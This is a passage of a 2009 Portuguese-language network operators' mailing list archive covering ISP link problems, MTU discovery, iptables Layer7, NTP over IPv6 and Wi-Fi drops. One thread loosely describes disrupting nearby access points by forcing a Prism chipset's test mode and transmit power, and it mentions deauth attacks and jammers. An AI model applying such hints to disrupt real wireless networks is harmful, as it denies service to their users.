gostaria de saber se algu?m mais est? sofrendo com baixa > > performance da mesma, com sa?das internacionais. > From alfredo.dalava at gmail.com Thu Jun 18 10:19:59 2009 From: alfredo.dalava at gmail.com (=?ISO-8859-1?Q?Alfredo_Dal=B4Ava_J=FAnior?=) Date: Thu, 18 Jun 2009 10:19:59 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: <4A38F3DE.15A6.0046.0@trf3.jus.br> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> Message-ID: Aqui n?s tivemos problemas inexplic?veis durante quase 1 m?s. A conex?o sempre ca?a e voltava depois de alguns instantes, e ficava caindo direto, mas n?o o dia todo. Depois de alguns dias observando, percebi que isto acontecia sempre que um dos consultores de venda chegava e ligava seu laptop (um Positivo, nao lembro o modelo). Troquei o AP por diversos modelos e n?o resolveu o problema..... este consultor n?o ficou muito tempo na empresa e depois que ele saiu nunca mais aconteceu essa queda. A equipe revirou o laptop e inclusive formataram e reinstalaram tudo pra n?o restar duvidas de problema com software ou virus. Achei isto grave.... como pode um simples notebook derrubar a conex?es de todos os outros? Simplesmente desconectava o wireless. Acredito ser um defeito no hardware do cart?o wifi deste laptop que fazia alguma coisa maluca como "sujar o spectro". O fato que ? realmente desconectava todos os outros e com o analisador de protocolo n?o pegava nada estranho e tamb?m n?o pegava nenhum outro AP em canais proximos (usando netstumbler). []'s Alfredo 2009/6/17 MARLON BORBA > Srs., > > Como n?o sou um profundo conhecedor de Wi-Fi, recorro aos "gurus" da > GTER. > > Pr?ximo da minha mesa, a uns 10 metros no m?ximo, h? um AP da Cisco. Na > maior parte do tempo estou conectado. No entanto, em alguns instantes, > acontecem inexplic?veis quedas da comunica??o. > > A esta??o (de laborat?rio) ? um Vista SP1 32bits, usando uma placa de > rede "wireless" PCI da D-Link. Estou certo de que o sistema operacional > e os "drivers" est?o atualizados. As configura??es tamb?m est?o corretas > (SSID, criptografia, passphrase etc). A rela??o sinal-ru?do est? OK (s? > tenho divis?rias finas entre a sala onde est? o AP e a minha). > > Executando uma ferramenta de "sniffing" constato que, na mesma hora das > quedas, h? alguns APs de outras empresas pr?ximas deste pr?dio (na Av. > Paulista :P) operando no mesmo canal, que ? o 6. > > Pergunta de leigo na ?rea de Wi-Fi: "Clash" de freq??ncias ? uma causa > para desconex?o? Seria o caso de trocar o canal do nosso AP, digamos > para o 8 (no qual, at? onde percebi, nenhum ponto pr?ximo opera)? > > > -- > > Abra?os, > > Marlon Borba, CISSP, APC DataCenter Associate > T?cnico Judici?rio ? Seguran?a da Informa??o > Comiss?o Local de Resposta a Incidentes - CLRI > TRF 3 Regi?o > (11) 3012-1581 > -- > Practically no IT system is risk free. > (NIST Special Publication 800-30) > -- > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From marcelo at valotta.com.br Thu Jun 18 10:43:23 2009 From: marcelo at valotta.com.br (Marcelo Valotta) Date: Thu, 18 Jun 2009 10:43:23 -0300 Subject: [GTER] Baixa Performance Link Telefonica In-Reply-To: <4A3A43A3.7060904@conectcor.com.br> References: <4A3A43A3.7060904@conectcor.com.br> Message-ID: <4d607e950906180643x2cc2a814g78d969f6fc0a14b7@mail.gmail.com> Nos aqui usamos as dicas sobre o MTU e conseguimos dar a volta na falha da telefonica. O Default era 1500 e baixamos para 1300. 2009/6/18 Welisson > Pois ?. > > Esse ? o problema e ? um chamado atr?s do outro e nunca falam, nada, > realmente o problema maior ? explicar para o cliente que o problema ? na > operadora transito nossa. > Quando v?o criar vergonha na cara e oferecer um servi?o digno? > > > Att, > > -- > ?Welisson Tom? > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From vbenincasa.listas at gmail.com Thu Jun 18 14:18:14 2009 From: vbenincasa.listas at gmail.com (Victor Benincasa) Date: Thu, 18 Jun 2009 14:18:14 -0300 Subject: [GTER] MTU x Telefonica References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com><4A363CAB.6080908@fertimitsui.com.br><6C07E4009BD94C9B9AF0A6B92844FFAA@servidor><86B6353E77864FCAA9BAE2F3C1CC636B@servidor><20090617215546.GJ79676@registro.br> Message-ID: <68C88A509219458FA405AE3550CD0D02@servidor> Boa dica Adelmo. O mturoute, conforme sugerido pelo nosso colega de lista Alberto Vargas, tamb?m ajuda muito nesta opera??o: http://www.elifulkerson.com/projects/mturoute.php -- Victor Benincasa http://netbit.com.br ----- Original Message ----- From: "Adelmo Junior" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" ; "Frederico A C Neves" Sent: Wednesday, June 17, 2009 7:16 PM Subject: Re: [GTER] MTU x Telefonica Pra descobrir o MTU: ping -f -l 1472 gelo.fertimitsui.com.br Se o ping funcionar, ent?o MTU = 1472 + 28 sen?o: ping -f -l 1470 gelo.fertimitsui.com.br, repetindo o procedimento... ou seja, comecem tentando em 1472 que ? o m?ximo, se n?o der... diminuam at? o ponto onde o "ping" come?a a "funcionar". Depois de encontrar esse ponto, basta adiciona +28 ao resultado. Este ? o valor MTU a ser usado. Acho que d? at? pra fazer um scriptzinho de acordo com a sa?da.... 2009/6/17 Frederico A C Neves > On Wed, Jun 17, 2009 at 06:06:52PM -0300, Danton Nunes wrote: > > On Wed, 17 Jun 2009, Itamar Reis Peixoto wrote: > > > > >j? que estamos falando de MTU, no ipv6 o MTU e' negociado > automaticamente. > > > > hummm, mas pode deixar que h? bastante espa?o para fazer besteira! no > IPv4 > > tamb?m, mas tem uns cretinos que barram ICMP nos firewalls e a? num > > fununcia! > > Em 2007 o IETF concluiu o WG PMTUD justamente para endere?ar este > problema e o resultado foi o m?todo alternativo descrito na > 4821. Apesar de STD n?o encontrei refer?ncia alguma para > implementa??es o que n?o ? um bom sinal. > > Fred > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From wagnerpaxs at gmail.com Thu Jun 18 16:47:56 2009 From: wagnerpaxs at gmail.com (Wagner Santos) Date: Thu, 18 Jun 2009 16:47:56 -0300 Subject: [GTER] Layer7 x Skype Message-ID: Car at s, Tenho um firewall Linux com iptables, onde nossas pol?ticas padr?es s?o todas DROP (INPUT, FORWARD e OUTPUT). Tudo funciona bem, exceto o Skype (preciso que o Skype funcione para toda a rede). Tenho tudo devidamente compilado e instalado por?m o Layer7 est? me retornado a seguinte mensagem: "layer7: couldn't get conntrack." J? fiz v?rias pesquisas mas n?o encontrei nenhuma solu??o, inclusive pesquisei aqui na lista, mas n?o encontrei nada. Algu?m j? passou por isso? -- Wagner Santos 81 9127 9823 / 81 8781 9823 wagnerpaxs @NOSPAM gmail.com wagner @NOSPAM dotlinux.net ICQ: 83709017 | Jabber: xwindow at jabber.org Linux User #408917 DotLinux.Net - http://www.dotlinux.net/ Debian-PE - http://pe.debianbrasil.org/ From alexandre at onda.psi.br Fri Jun 19 01:07:53 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Fri, 19 Jun 2009 01:07:53 -0300 Subject: [GTER] a.ntp.br via ipv6 nao funciona Message-ID: <4A3B0F19.5000009@onda.psi.br> Alguem da nic.br poderia verificar isto: # host a.ntp.br a.ntp.br has address 200.160.0.8 a.ntp.br has IPv6 address 2001:12ff::8 # ntpdate -6 a.ntp.br 19 Jun 01:05:23 ntpdate[21130]: no server suitable for synchronization found # ntpdate 2001:12ff::8 19 Jun 01:05:23 ntpdate[21130]: no server suitable for synchronization found # ping6 ipv6.google.com PING ipv6.google.com(yo-in-x68.google.com) 56 data bytes 64 bytes from yo-in-x68.google.com: icmp_seq=0 ttl=57 time=136 ms 64 bytes from yo-in-x68.google.com: icmp_seq=1 ttl=57 time=137 ms via ipv4, tranquilo ! # ntpdate a.ntp.br 19 Jun 01:07:04 ntpdate[21346]: adjust time server 200.160.0.8 offset 0.003274 sec obrigado !!! -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From marcusandree at gmail.com Fri Jun 19 08:58:48 2009 From: marcusandree at gmail.com (Marcus Andree) Date: Fri, 19 Jun 2009 08:58:48 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: References: <4A38F3DE.15A6.0046.0@trf3.jus.br> Message-ID: Ja comentei em algumas outras mensagens que construi um access point para uso proprio, com um SBC Soekris rodando OpenBSD. Uma das tarefas que empreendi foi reescrever minimamente o driver das placa de rede PCMCIA que uso (algumas Sanao baseadas no chipset Prism). Um dos "efeitos colaterais" nao previstos do driver reescrito foi a implementacao de um argumento de linha de comando do ifconfig que, mensuravelmente, conseguia "derrubar" qualquer Access Point num raio de, pelo menos, 20 metros indoor, com inumeras paredes de alvenaria. Ha uma serie de funcionalidades para fins de testes de laboratorios que sao suportadas no hardware e, certamente, nao sao utilizadas pelos drivers "oficiais". Um hardware defeituoso, um driver mal feito, ou um virus mais "esperto" podem, certamente, ativar alguma dessas funcionalidades em areas ou momentos improprios. Analisadores de protocolo nao sao muito uteis para identificar, tecnicamente, o problema. Claro que ajudam a detectar equipamentos "rogue" e posiciona-los, porem, para uma abordagem "cientifica", voce precisaria de um analisador de espectro. > Achei isto grave.... como pode um simples notebook derrubar a conex?es de > todos os outros? Simplesmente desconectava o wireless. Acredito ser um > defeito no hardware do cart?o wifi deste laptop que fazia alguma coisa > maluca como "sujar o spectro". O fato que ? realmente desconectava todos > os > outros e com o analisador de protocolo n?o pegava nada estranho e tamb?m > n?o > pegava nenhum outro AP em canais proximos (usando netstumbler). > > []'s From adriano at acmesecurity.org Fri Jun 19 09:13:17 2009 From: adriano at acmesecurity.org (Adriano Cansian) Date: Fri, 19 Jun 2009 09:13:17 -0300 Subject: [GTER] Link para transmissao do evento GTER-27 / GTS-13 Message-ID: <2B564CB9-7F33-411A-AD05-C95125F1D0EF@acmesecurity.org> GTS - Grupo de Trabalho em Seguran?a de Redes - 13? Reuni?o GTER - Grupo de Trabalho de Engenharia e Opera??o de Redes - 27? Reuni?o S?o Paulo - 19 (GTER) e 20 (GTS) de junho de 2009 Link para transmiss?o online: mms://200.160.1.20/gter-gts (320x240 282 kbps e 640x480 1 Mbps - escolha autom?tica) Intera??o com o evento: * Confer?ncia via Instant Messenger Jabber: Usar "Joing Groupchat" (no menu "General"). Configura??es: Host: conference.jabber.registro.br Room: gtergts Nickname: * email: gter at registro.br (GTER) * email: gts at registro.br (GTS) Material (slides): * ftp://ftp.registro.br/pub/gter * ftp://ftp.registro.br/pub/gts From marcelo at valotta.com.br Fri Jun 19 06:17:31 2009 From: marcelo at valotta.com.br (Marcelo Valotta) Date: Fri, 19 Jun 2009 06:17:31 -0300 Subject: [GTER] Baixa Performance Link Telefonica [era Re: Problemas comLink Telefonica] In-Reply-To: References: <4A393802.8020303@conectcor.com.br> <4d607e950906180332v7714edf0r6b31806671cb0178@mail.gmail.com> Message-ID: <4d607e950906190217w74cc3e5dp6d62ef7424e10a71@mail.gmail.com> Os atendimentos est?o pessimos, mas na hora da cobran?a do link dedicado entra em contato o famoso gerente de conta. Marcelo yesida.com 2009/6/18 Alfredo Dal?Ava J?nior > N?o ? s? telefonica. Na Oi existe um problema em um link entre eles e a > globalcrossing que est? com perda de pacotes a mais de duas semanas, > impossibilitando o uso de Voip por parte de um cliente. > > Temos um ponto em Jundia? com link embratel. Ent?o toda conex?o praquele > determinado IP ? desviado para Jundia? (pela internet mesmo) e de l? sai > via > Embratel. > > O problema ? que estas empresas que s?o muito grandes n?o t?m uma rela??o > muito pr?xima dos clientes. Tratam no 0800 um cliente corporativo com > 70Mbps > como se fosse um cliente Velox de 300kbps. Tratam profissionais e > especialistas em redes como se fossem um simples usu?rio residencial, sem > conhecimento algum de redes. Se vc tem alguma reclama??o n?o tem como falar > com o supervisor, com o gerente nem com o diretor da empresa. ? todo mundo > "blindado" pelo 0800... > > []'s > Alfredo > > 2009/6/18 Marcelo Valotta > > > Temos notado aqui que o problema ocorre desde o dia 29 de maio, mas a > > telefonica n?o > > assume tais erros os quais so ficamos sabendo apos muita pesquisa. > > O pior ? explicar para os clientes que a falha so ocorre em servidores > fora > > do pais eles > > entram em contato com a telefonica que faz teste de ping para o terra e > uol > > e diz para o cliente viu num tem erro. > > Fica dificil.... > > > > Marcelo Valotta > > hrrp://yesida.com > > > > 2009/6/17 Victor Benincasa > > > > > SIM! > > > > > > Telec?mica j? virou motivo de piada, falhas atr?s de falhas, desculpas > > > esfarrapadas, > > > perda de tempo e preju?zo para todos! > > > > > > Hoje ouvi uma reportagem na CBN sobre o mais novo problema da semana... > > > Ligaram duas vezes l?, cada atendente falou uma coisa totalmente > > diferente. > > > E > > > no final a Telef?nica se pronunciou alegando informa??o equivocada dos > > > atendentes. O caos, desinforma??o, p?ssima qualidade e desrespeito > > imperam > > > l?. > > > > > > > > > -- > > > Victor Benincasa > > > http://netbit.com.br > > > > > > > > > ----- Original Message ----- From: "Welisson" < > welisson at conectcor.com.br > > > > > > To: > > > Sent: Wednesday, June 17, 2009 3:37 PM > > > Subject: [GTER] Baixa Performance Link Telefonica [era Re: Problemas > > > comLink Telefonica] > > > Caros colegas, sei que muita gente esses ?ltimos dias at? meses, tem > > > comentado-se muito sobre a TELEFONICA. > > > Ent?o gostaria de saber se algu?m mais est? sofrendo com baixa > > > performance da mesma, com sa?das internacionais. > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From antoniocarlospina at gmail.com Fri Jun 19 09:23:02 2009 From: antoniocarlospina at gmail.com (Antonio Carlos Pina) Date: Fri, 19 Jun 2009 09:23:02 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: References: <4A38F3DE.15A6.0046.0@trf3.jus.br> Message-ID: <86b352050906190523g141b56di641e6527ebec4688@mail.gmail.com> Penso que seria uma bela apresenta??o para um GTS. Embora n?o seja "invas?o", n?o deixa de ser um ataque que pode ser ativado por um funcion?rio deixando o administrador em maus len??is. Abs 2009/6/19 Marcus Andree > Ja comentei em algumas outras mensagens que construi um access point > para uso proprio, com um SBC Soekris rodando OpenBSD. > > Uma das tarefas que empreendi foi reescrever minimamente o driver das > placa de rede PCMCIA que uso (algumas Sanao baseadas no chipset > Prism). > > Um dos "efeitos colaterais" nao previstos do driver reescrito foi a > implementacao de um argumento de linha de comando do ifconfig que, > mensuravelmente, conseguia "derrubar" qualquer Access Point num > raio de, pelo menos, 20 metros indoor, com inumeras paredes de > alvenaria. > > Ha uma serie de funcionalidades para fins de testes de laboratorios > que sao suportadas no hardware e, certamente, nao sao utilizadas > pelos drivers "oficiais". Um hardware defeituoso, um driver mal feito, > ou um virus mais "esperto" podem, certamente, ativar alguma dessas > funcionalidades em areas ou momentos improprios. > > Analisadores de protocolo nao sao muito uteis para identificar, > tecnicamente, > o problema. Claro que ajudam a detectar equipamentos "rogue" e > posiciona-los, porem, para uma abordagem "cientifica", voce precisaria > de um analisador de espectro. > > > > > > Achei isto grave.... como pode um simples notebook derrubar a conex?es de > > todos os outros? Simplesmente desconectava o wireless. Acredito ser um > > defeito no hardware do cart?o wifi deste laptop que fazia alguma coisa > > maluca como "sujar o spectro". O fato que ? realmente desconectava todos > > os > > outros e com o analisador de protocolo n?o pegava nada estranho e tamb?m > > n?o > > pegava nenhum outro AP em canais proximos (usando netstumbler). > > > > []'s > > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From marcusandree at gmail.com Fri Jun 19 09:27:31 2009 From: marcusandree at gmail.com (Marcus Andree) Date: Fri, 19 Jun 2009 09:27:31 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: <86b352050906190523g141b56di641e6527ebec4688@mail.gmail.com> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> <86b352050906190523g141b56di641e6527ebec4688@mail.gmail.com> Message-ID: Sim, eh um belo exemplo de um DoS. 2009/6/19 Antonio Carlos Pina > Penso que seria uma bela apresenta??o para um GTS. Embora n?o seja > "invas?o", n?o deixa de ser um ataque que pode ser ativado por um > funcion?rio deixando o administrador em maus len??is. > > Abs > > 2009/6/19 Marcus Andree > > > Ja comentei em algumas outras mensagens que construi um access point > > para uso proprio, com um SBC Soekris rodando OpenBSD. > > > > Uma das tarefas que empreendi foi reescrever minimamente o driver das > > placa de rede PCMCIA que uso (algumas Sanao baseadas no chipset > > Prism). > > > > Um dos "efeitos colaterais" nao previstos do driver reescrito foi a > > implementacao de um argumento de linha de comando do ifconfig que, > > mensuravelmente, conseguia "derrubar" qualquer Access Point num > > raio de, pelo menos, 20 metros indoor, com inumeras paredes de > > alvenaria. > > > > Ha uma serie de funcionalidades para fins de testes de laboratorios > > que sao suportadas no hardware e, certamente, nao sao utilizadas > > pelos drivers "oficiais". Um hardware defeituoso, um driver mal feito, > > ou um virus mais "esperto" podem, certamente, ativar alguma dessas > > funcionalidades em areas ou momentos improprios. > > > > Analisadores de protocolo nao sao muito uteis para identificar, > > tecnicamente, > > o problema. Claro que ajudam a detectar equipamentos "rogue" e > > posiciona-los, porem, para uma abordagem "cientifica", voce precisaria > > de um analisador de espectro. > > > > > > > > > > > Achei isto grave.... como pode um simples notebook derrubar a conex?es > de > > > todos os outros? Simplesmente desconectava o wireless. Acredito ser um > > > defeito no hardware do cart?o wifi deste laptop que fazia alguma coisa > > > maluca como "sujar o spectro". O fato que ? realmente desconectava > todos > > > os > > > outros e com o analisador de protocolo n?o pegava nada estranho e > tamb?m > > > n?o > > > pegava nenhum outro AP em canais proximos (usando netstumbler). > > > > > > []'s > > > > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From hygort at gmail.com Fri Jun 19 09:34:20 2009 From: hygort at gmail.com (Hygor) Date: Fri, 19 Jun 2009 09:34:20 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: References: <4A38F3DE.15A6.0046.0@trf3.jus.br> <86b352050906190523g141b56di641e6527ebec4688@mail.gmail.com> Message-ID: <4f69dec0906190534le3b7aeeh11a7ecec962b4569@mail.gmail.com> Marcus essa "fun??o" que voc? fez.. seria algo com deauth? Drivers e placas com problemas.. podem sim derrubar uma rede n?o somente wireless mais rede via cabo tb Hygor Cavalcante FSNetwork Consultoria 2009/6/19 Marcus Andree > Sim, eh um belo exemplo de um DoS. > > 2009/6/19 Antonio Carlos Pina > > > Penso que seria uma bela apresenta??o para um GTS. Embora n?o seja > > "invas?o", n?o deixa de ser um ataque que pode ser ativado por um > > funcion?rio deixando o administrador em maus len??is. > > > > Abs > > > > 2009/6/19 Marcus Andree > > > > > Ja comentei em algumas outras mensagens que construi um access point > > > para uso proprio, com um SBC Soekris rodando OpenBSD. > > > > > > Uma das tarefas que empreendi foi reescrever minimamente o driver das > > > placa de rede PCMCIA que uso (algumas Sanao baseadas no chipset > > > Prism). > > > > > > Um dos "efeitos colaterais" nao previstos do driver reescrito foi a > > > implementacao de um argumento de linha de comando do ifconfig que, > > > mensuravelmente, conseguia "derrubar" qualquer Access Point num > > > raio de, pelo menos, 20 metros indoor, com inumeras paredes de > > > alvenaria. > > > > > > Ha uma serie de funcionalidades para fins de testes de laboratorios > > > que sao suportadas no hardware e, certamente, nao sao utilizadas > > > pelos drivers "oficiais". Um hardware defeituoso, um driver mal feito, > > > ou um virus mais "esperto" podem, certamente, ativar alguma dessas > > > funcionalidades em areas ou momentos improprios. > > > > > > Analisadores de protocolo nao sao muito uteis para identificar, > > > tecnicamente, > > > o problema. Claro que ajudam a detectar equipamentos "rogue" e > > > posiciona-los, porem, para uma abordagem "cientifica", voce precisaria > > > de um analisador de espectro. > > > > > > > > > > > > > > > > Achei isto grave.... como pode um simples notebook derrubar a > conex?es > > de > > > > todos os outros? Simplesmente desconectava o wireless. Acredito ser > um > > > > defeito no hardware do cart?o wifi deste laptop que fazia alguma > coisa > > > > maluca como "sujar o spectro". O fato que ? realmente desconectava > > todos > > > > os > > > > outros e com o analisador de protocolo n?o pegava nada estranho e > > tamb?m > > > > n?o > > > > pegava nenhum outro AP em canais proximos (usando netstumbler). > > > > > > > > []'s > > > > > > > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- FSNETWORK CONSULTORIA hygor at bsd.com.br From marcusandree at gmail.com Fri Jun 19 09:56:35 2009 From: marcusandree at gmail.com (Marcus Andree) Date: Fri, 19 Jun 2009 09:56:35 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: <4f69dec0906190534le3b7aeeh11a7ecec962b4569@mail.gmail.com> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> <86b352050906190523g141b56di641e6527ebec4688@mail.gmail.com> <4f69dec0906190534le3b7aeeh11a7ecec962b4569@mail.gmail.com> Message-ID: Olha, nao me pareceu ser um uso direto do protocolo, "dentro das regras". Colocava a placa em modo de testes, sem gerenciamento automatico de potencia de transmissao e com controle de todos os canais RF, inclusive algumas frequencias nao homologadas para este uso no territorio nacional, mas autorizadas pelo governo japones. Ao brincar um pouco de setar a potencia de transmissao "na unha", direto no chipset, podia perceber que os micros conectados, inclusive em outros access points, perdiam a conexao de rede instantaneamente. Tentativas de reconexao se mostraram inuteis. A verdadeira razao para isso ainda e' misteriosa para mim, razao pela qual rotulei essa "funcionalidade" como "efeito colateral". Por um mix de falta de tempo e de recursos (analisador de espectro), nao fiz um diagnostico tecnico, mas suspeito que o chipset tenha perdido o controle de qual frequencia seria transmitido o beacon da rede sem fio, bem como o intervalo de tempo destas transmissoes, virtualmente jogando "lixo" em frequencias fora do canal setado no equipamento, mas com potencia suficiente para interferir nos outros aparelhos. Os militares chamam isso de "contra-medidas" enquanto nos chamamos de DoS.... 2009/6/19 Hygor > Marcus essa "fun??o" que voc? fez.. seria algo com deauth? > > Drivers e placas com problemas.. podem sim derrubar uma rede n?o somente > wireless mais rede via cabo tb > > > Hygor Cavalcante > FSNetwork Consultoria > > > 2009/6/19 Marcus Andree > > > Sim, eh um belo exemplo de um DoS. > > > > 2009/6/19 Antonio Carlos Pina > > > > > Penso que seria uma bela apresenta??o para um GTS. Embora n?o seja > > > "invas?o", n?o deixa de ser um ataque que pode ser ativado por um > > > funcion?rio deixando o administrador em maus len??is. > > > > > > Abs > > > > > > 2009/6/19 Marcus Andree > > > > > > > Ja comentei em algumas outras mensagens que construi um access point > > > > para uso proprio, com um SBC Soekris rodando OpenBSD. > > > > > > > > Uma das tarefas que empreendi foi reescrever minimamente o driver das > > > > placa de rede PCMCIA que uso (algumas Sanao baseadas no chipset > > > > Prism). > > > > > > > > Um dos "efeitos colaterais" nao previstos do driver reescrito foi a > > > > implementacao de um argumento de linha de comando do ifconfig que, > > > > mensuravelmente, conseguia "derrubar" qualquer Access Point num > > > > raio de, pelo menos, 20 metros indoor, com inumeras paredes de > > > > alvenaria. > > > > > > > > Ha uma serie de funcionalidades para fins de testes de laboratorios > > > > que sao suportadas no hardware e, certamente, nao sao utilizadas > > > > pelos drivers "oficiais". Um hardware defeituoso, um driver mal > feito, > > > > ou um virus mais "esperto" podem, certamente, ativar alguma dessas > > > > funcionalidades em areas ou momentos improprios. > > > > > > > > Analisadores de protocolo nao sao muito uteis para identificar, > > > > tecnicamente, > > > > o problema. Claro que ajudam a detectar equipamentos "rogue" e > > > > posiciona-los, porem, para uma abordagem "cientifica", voce > precisaria > > > > de um analisador de espectro. > > > > > > > > > > > > > > > > > > > > > Achei isto grave.... como pode um simples notebook derrubar a > > conex?es > > > de > > > > > todos os outros? Simplesmente desconectava o wireless. Acredito ser > > um > > > > > defeito no hardware do cart?o wifi deste laptop que fazia alguma > > coisa > > > > > maluca como "sujar o spectro". O fato que ? realmente desconectava > > > todos > > > > > os > > > > > outros e com o analisador de protocolo n?o pegava nada estranho e > > > tamb?m > > > > > n?o > > > > > pegava nenhum outro AP em canais proximos (usando netstumbler). > > > > > > > > > > []'s > > > > > > > > > > > > > > > > -- > > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > FSNETWORK CONSULTORIA > hygor at bsd.com.br > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From lscrlstld at gmail.com Fri Jun 19 10:33:39 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Fri, 19 Jun 2009 10:33:39 -0300 Subject: [GTER] RES: "Clash" de canais no Wi-Fi. In-Reply-To: <86b352050906190523g141b56di641e6527ebec4688@mail.gmail.com> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> <86b352050906190523g141b56di641e6527ebec4688@mail.gmail.com> Message-ID: <104464F2C818429D9DB51DFF6ACA421B@toledoPC> Existem jammers que derrubam tudo (2.4 ou 5.8) num raio de 150mts e cabem na palma da m?o. > > Penso que seria uma bela apresenta??o para um GTS. Embora n?o > seja "invas?o", n?o deixa de ser um ataque que pode ser > ativado por um funcion?rio deixando o administrador em maus len??is. > > Abs > From lscrlstld at gmail.com Fri Jun 19 10:34:45 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Fri, 19 Jun 2009 10:34:45 -0300 Subject: [GTER] RES: "Clash" de canais no Wi-Fi. In-Reply-To: <4f69dec0906190534le3b7aeeh11a7ecec962b4569@mail.gmail.com> References: <4A38F3DE.15A6.0046.0@trf3.jus.br><86b352050906190523g141b56di641e6527ebec4688@mail.gmail.com> <4f69dec0906190534le3b7aeeh11a7ecec962b4569@mail.gmail.com> Message-ID: <3285F00A780C4AD9AB1FAD66E29FDECF@toledoPC> Um ataque de deauth ? classico, mas melhor descrever na lista GTS-L. > Marcus essa "fun??o" que voc? fez.. seria algo com deauth? > > Drivers e placas com problemas.. podem sim derrubar uma rede > n?o somente wireless mais rede via cabo tb > > > Hygor Cavalcante > FSNetwork Consultoria From webgeo at gmail.com Fri Jun 19 10:53:20 2009 From: webgeo at gmail.com (Giovane Heleno) Date: Fri, 19 Jun 2009 10:53:20 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: <4201a710906180848g1059ab61nccdcd8251cf728df@mail.gmail.com> References: <4A33AE1B.7010106@jarruda.com> <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> <20090617215546.GJ79676@registro.br> <276fbe8b0906171531k46488e92r240a8314402fda7e@mail.gmail.com> <4201a710906180848g1059ab61nccdcd8251cf728df@mail.gmail.com> Message-ID: Lulyis, Testei daqui at? os ips infomados no trace, e todos deram 1500 de MTU. N?o est? ocorrendo com voc? por causa do PPPoE? Acredito que em PPPoE, o MTU ? menor mesmo. Giovane Heleno Wideway do Brasil Ltda. www.wideway.com.br 2009/6/18 Lulyis : > Realizamos testes com mturoute partindo de uma conex?o speed business, ip de > origem 200.168.160.157, com destino ? rede da Diveo ip 200.202.116.106. > Segue abaixo o resultado: > > C:\>mturoute 200.202.116.106 > * ICMP Fragmentation is not permitted. * > * Maximum payload is 10000 bytes. * > - ICMP payload of 5046 bytes failed.. > - ICMP payload of 2569 bytes failed.. > + ICMP payload of 1330 bytes succeeded. > - ICMP payload of 1949 bytes failed.. > - ICMP payload of 1639 bytes failed.. > - ICMP payload of 1484 bytes failed.. > - ICMP payload of 1407 bytes failed.. > - ICMP payload of 1368 bytes failed.. > + ICMP payload of 1349 bytes succeeded. > + ICMP payload of 1358 bytes succeeded. > + ICMP payload of 1363 bytes succeeded. > - ICMP payload of 1365 bytes failed.. > + ICMP payload of 1364 bytes succeeded. > + ICMP payload of 1364 bytes succeeded. > Path MTU: 1392 bytes. > > C:\>mturoute -t 200.202.116.106 > mturoute to 200.202.116.106, 30 hops max, variable sized packets > * ICMP Fragmentation is not permitted. * > * Maximum payload is 10000 bytes. * > ?1 ?--+-----+++-++ ?host: 200.168.160.129 ?max: 1392 bytes > ?2 ?... (host 192.168.32.1 is not responding) > ?3 ? 4 ?--+-----+++-++ ?host: 189.109.67.70 ?max: 1392 bytes > ?5 ?--+-----+++-++ ?host: 201.85.1.6 ?max: 1392 bytes > ?6 ?--+-----+++-++ ?host: 200.202.112.122 ?max: 1392 bytes > ?7 ?--+-----+++-++ ?host: 200.202.116.106 ?max: 1392 bytes > > > Aparentemente a Telefonica est? limitando o MTU dos pacotes em 1364 bytes. > Algu?m da telefonica nesta lista que poderia verificar ou encaminhar > internamente? Se poss?vel, nos retornem no telefone 15180*100. > From wilson at registro.br Fri Jun 19 11:10:44 2009 From: wilson at registro.br (Wilson Rogerio Lopes) Date: Fri, 19 Jun 2009 11:10:44 -0300 Subject: [GTER] a.ntp.br via ipv6 nao funciona In-Reply-To: <4A3B0F19.5000009@onda.psi.br> References: <4A3B0F19.5000009@onda.psi.br> Message-ID: <20090619141044.GA94988@registro.br> Alexandre, voc? executou o ntpdate como root ? Se n?o, use a op??o "-q" para apenas consultar, e n?o sincronizar a m?quina local. Acabo de verificar e o sevidor a.ntp.br responde sem problema. $ ntpdate -q -6 a.ntp.br server 2001:12ff::8, stratum 2, offset -0.000768, delay 0.02596 19 Jun 11:06:16 ntpdate[94975]: adjust time server 2001:12ff::8 offset -0.000768 sec On Fri, Jun 19, 2009 at 01:07:53AM -0300, Alexandre J. Correa - Onda Internet wrote: > Alguem da nic.br poderia verificar isto: > > # host a.ntp.br > a.ntp.br has address 200.160.0.8 > a.ntp.br has IPv6 address 2001:12ff::8 > > # ntpdate -6 a.ntp.br > 19 Jun 01:05:23 ntpdate[21130]: no server suitable for synchronization found > > # ntpdate 2001:12ff::8 > 19 Jun 01:05:23 ntpdate[21130]: no server suitable for synchronization found > > # ping6 ipv6.google.com > PING ipv6.google.com(yo-in-x68.google.com) 56 data bytes > 64 bytes from yo-in-x68.google.com: icmp_seq=0 ttl=57 time=136 ms > 64 bytes from 